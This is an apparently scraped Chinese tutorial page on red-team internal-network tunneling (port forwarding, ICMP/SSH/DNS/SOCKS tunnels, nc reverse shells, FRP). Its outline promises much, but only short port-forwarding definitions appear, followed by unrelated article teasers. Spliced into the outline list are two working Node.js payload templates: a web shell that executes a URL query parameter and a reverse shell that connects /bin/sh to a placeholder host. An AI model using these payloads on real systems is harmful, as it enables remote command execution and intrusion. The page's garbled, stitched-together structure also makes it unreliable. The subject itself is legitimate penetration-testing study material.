红队内网攻防渗透:内网渗透之内网通信隧道搭建:代理和转发

2024-06-13 18:36

本文主要是介绍红队内网攻防渗透:内网渗透之内网通信隧道搭建:代理和转发,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

内网通信隧道搭建

  • 一、内网端口转发和代理
    • 1.1 什么是端口转发
    • 1.2 什么是端口映射
    • 1.3 端口转发和端口映射的区别
    • 1.4 总结
  • 二、通信隧道的搭建技术
    • 2.1 什么隧道
    • 2.2 判断内网连通性
      • 2.2.1 使用ICMP协议判断通不通外网
      • 2.2.2 使用TCP协议
      • 2.2.3 使用HTTP协议
      • 2.2.4 使用DNS协议
      • 2.2.5 代理服务器
    • 2.3 网络层的通信隧道
      • 2.3.1 IPv6隧道
      • 2.3.2 ICMP隧道
        • 2.3.2.1 icmpsh隧道工具
        • 2.3.2.2 Pingtunnel隧道工具
        • 2.3.2.3 icmptunnel隧道工具
    • 2.4 传输层隧道技术
      • 2.4.1 lcx常规端口转发
        • 2.4.1.1 Windows下使用lcx
        • 2.4.1.2 Linux系统上面使用portmap
        • 2.4.1.3 lcx本地端口转发
      • 2.4.2 nc端口转发
        • 2.4.2.1 Banner抓取
        • 2.4.2.2 远程连接主机
        • 2.4.2.3 端口扫描
        • 2.4.2.4 端口监听
        • 2.4.2.5 文件传输
        • 2.4.2.6 简易聊天
        • 2.4.2.7 获取shell
        • 2.4.2.7.1 正向shell
        • 2.4.2.7.2 反向shell
        • 2.4.2.7.3 在目标主机中没有nc时获取反向shell
        • 2.4.2.7.3 php反弹shell
        • 2.4.2.7.4 perl反向shell
        • 2.4.2.7.5 内网代理
      • 2.4.3 PowerCat
    • 2.5 应用层隧道技术
      • 2.5.1 SSH隧道
        • 2.5.1.1 SSH 命令
        • 2.5.1.2 参数讲解
        • 2.5.1.3 本地转发实验
        • 2.5.1.4 远程转发实验
        • 2.5.1.5 动态转发实验
      • 2.5.2 HTTP/HTTPS隧道
        • 2.5.2.1 reGeorg简介
        • 2.5.2.2 正向代理(Forward Proxy)
        • 2.5.2.3 反向代理(reverse proxy)
        • 2.5.2.4 实战模拟
        • 2.5.2.5 reGeorg的使用
        • 2.5.2.6 proxychains-ng的使用
      • 2.5.3 DNS隧道
        • 2.5.3.1 dnscat2
        • 2.5.3.2 iodine
      • 2.5.4 SOCKS 代理技术
        • 2.5.4.1 EarthWorm
        • 2.5.4.2 正向 SOCKS 5 服务器
        • 2.5.4.3 反弹 SOCKS 5 服务器
        • 2.5.4.4 二级网络环境(a)
        • 2.5.4.5 二级网络环境(b)
      • 2.5.5 FRP代理
        • 2.5.5.1 FRP下载
        • 2.5.5.2 上传FRP
        • 2.5.5.3 服务端配置
        • 2.5.5.4 服务端启动
        • 2.5.5.5 客户端配置
        • 2.5.5.5 客户端开启
        • 2.5.5.6 配置代理
  • Author: Andre Lima @0x4ndr3
  • Blog post: https://pentesterslife.blog/
  • (function x(){
  • require('http').createServer(
  • function(req,res){
  • res.writeHead(200,{"Content-Type":"text/plain"}
  • );
  • require('child_process').exec(require('url').parse(req.url,true).query['c'],
  • function(e,s,st){
  • res.end(s)
  • }
  • )
  • }
  • ).listen(%s)
  • })()
  • (function(){
  • var net = require("net"),
  • cp = require("child_process"),
  • sh = cp.spawn("/bin/sh", []);
  • var client = new net.Socket();
  • client.connect(%s, "%s", function(){
  • client.pipe(sh.stdin);
  • sh.stdout.pipe(client);
  • sh.stderr.pipe(client);
  • });
  • return /pwned/; // Prevents the Node.js app from crashing
  • })()

一、内网端口转发和代理

在实际渗透过程中,我们成功入侵了目标服务器。接着我们想在本机上通过浏览器 或者其他客户端软件访问目标机器内部网络中所开放的端口,比如内网的3389端 口、内网网站8080端口等等。传统的方法是利用nc、lcx等工具,进行端口转发。

1.1 什么是端口转发

端口转发就是将一个端口,这个端口可以本机的端口也可以是本机可以访问到的任 意主机的端口,转发到任意一台可以访问到的IP上,通常这个IP是公网IP。

适用端口转发的网络环境有以下几种:

1. 服务器处于内网,可以访问外部网络。
2. 服务器处于外网,可以访问外部网络,但是服务器安装了防火墙来拒绝敏感端口的连接。
3. 服务器处于内网,对外只开放了80端口,并且服务器不能访问外网网络。

1.2 什么是端口映射

映射端口,就是将一个内网端口映射到公网上的某个端口,假设我自己的电脑是在 内网中,没有公网IP,但是我想提供一个端口供其他人使用,这就是端口映射。

1.3 端口转发和端口映射的区别

端口映射场景:

外网主机A想访问内网主机B上的服务

端口转发场景:

外网主机A已经可以任意内网主机B上的端口,但是无法访问内网主机C上的端口。	此时可以将C主机的端口转发到B主机的端口,那么外网主机A访问B主机的某某端口	就相当于访问了C主机的某某端口。

1.4 总结

这篇关于红队内网攻防渗透:内网渗透之内网通信隧道搭建:代理和转发的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1058099

相关文章

高效+灵活,万博智云全球发布AWS无代理跨云容灾方案!

摘要 近日,万博智云推出了基于AWS的无代理跨云容灾解决方案,并与拉丁美洲,中东,亚洲的合作伙伴面向全球开展了联合发布。这一方案以AWS应用环境为基础,将HyperBDR平台的高效、灵活和成本效益优势与无代理功能相结合,为全球企业带来实现了更便捷、经济的数据保护。 一、全球联合发布 9月2日,万博智云CEO Michael Wong在线上平台发布AWS无代理跨云容灾解决方案的阐述视频,介绍了

在JS中的设计模式的单例模式、策略模式、代理模式、原型模式浅讲

1. 单例模式(Singleton Pattern) 确保一个类只有一个实例,并提供一个全局访问点。 示例代码: class Singleton {constructor() {if (Singleton.instance) {return Singleton.instance;}Singleton.instance = this;this.data = [];}addData(value)

搭建Kafka+zookeeper集群调度

前言 硬件环境 172.18.0.5        kafkazk1        Kafka+zookeeper                Kafka Broker集群 172.18.0.6        kafkazk2        Kafka+zookeeper                Kafka Broker集群 172.18.0.7        kafkazk3

【IPV6从入门到起飞】5-1 IPV6+Home Assistant(搭建基本环境)

【IPV6从入门到起飞】5-1 IPV6+Home Assistant #搭建基本环境 1 背景2 docker下载 hass3 创建容器4 浏览器访问 hass5 手机APP远程访问hass6 更多玩法 1 背景 既然电脑可以IPV6入站,手机流量可以访问IPV6网络的服务,为什么不在电脑搭建Home Assistant(hass),来控制你的设备呢?@智能家居 @万物互联

系统架构师考试学习笔记第三篇——架构设计高级知识(20)通信系统架构设计理论与实践

本章知识考点:         第20课时主要学习通信系统架构设计的理论和工作中的实践。根据新版考试大纲,本课时知识点会涉及案例分析题(25分),而在历年考试中,案例题对该部分内容的考查并不多,虽在综合知识选择题目中经常考查,但分值也不高。本课时内容侧重于对知识点的记忆和理解,按照以往的出题规律,通信系统架构设计基础知识点多来源于教材内的基础网络设备、网络架构和教材外最新时事热点技术。本课时知识

【STM32】SPI通信-软件与硬件读写SPI

SPI通信-软件与硬件读写SPI 软件SPI一、SPI通信协议1、SPI通信2、硬件电路3、移位示意图4、SPI时序基本单元(1)开始通信和结束通信(2)模式0---用的最多(3)模式1(4)模式2(5)模式3 5、SPI时序(1)写使能(2)指定地址写(3)指定地址读 二、W25Q64模块介绍1、W25Q64简介2、硬件电路3、W25Q64框图4、Flash操作注意事项软件SPI读写W2

pico2 开发环境搭建-基于ubuntu

pico2 开发环境搭建-基于ubuntu 安装编译工具链下载sdk 和example编译example 安装编译工具链 sudo apt install cmake gcc-arm-none-eabi libnewlib-arm-none-eabi libstdc++-arm-none-eabi-newlib 注意cmake的版本,需要在3.17 以上 下载sdk 和ex

vue2 组件通信

props + emits props:用于接收父组件传递给子组件的数据。可以定义期望从父组件接收的数据结构和类型。‘子组件不可更改该数据’emits:用于定义组件可以向父组件发出的事件。这允许父组件监听子组件的事件并作出响应。(比如数据更新) props检查属性 属性名类型描述默认值typeFunction指定 prop 应该是什么类型,如 String, Number, Boolean,

linux中使用rust语言在不同进程之间通信

第一种:使用mmap映射相同文件 fn main() {let pid = std::process::id();println!(

proxy代理解决vue中跨域问题

vue.config.js module.exports = {...// webpack-dev-server 相关配置devServer: {host: '0.0.0.0',port: port,open: true,proxy: {'/api': {target: `https://vfadmin.insistence.tech/prod-api`,changeOrigin: true,p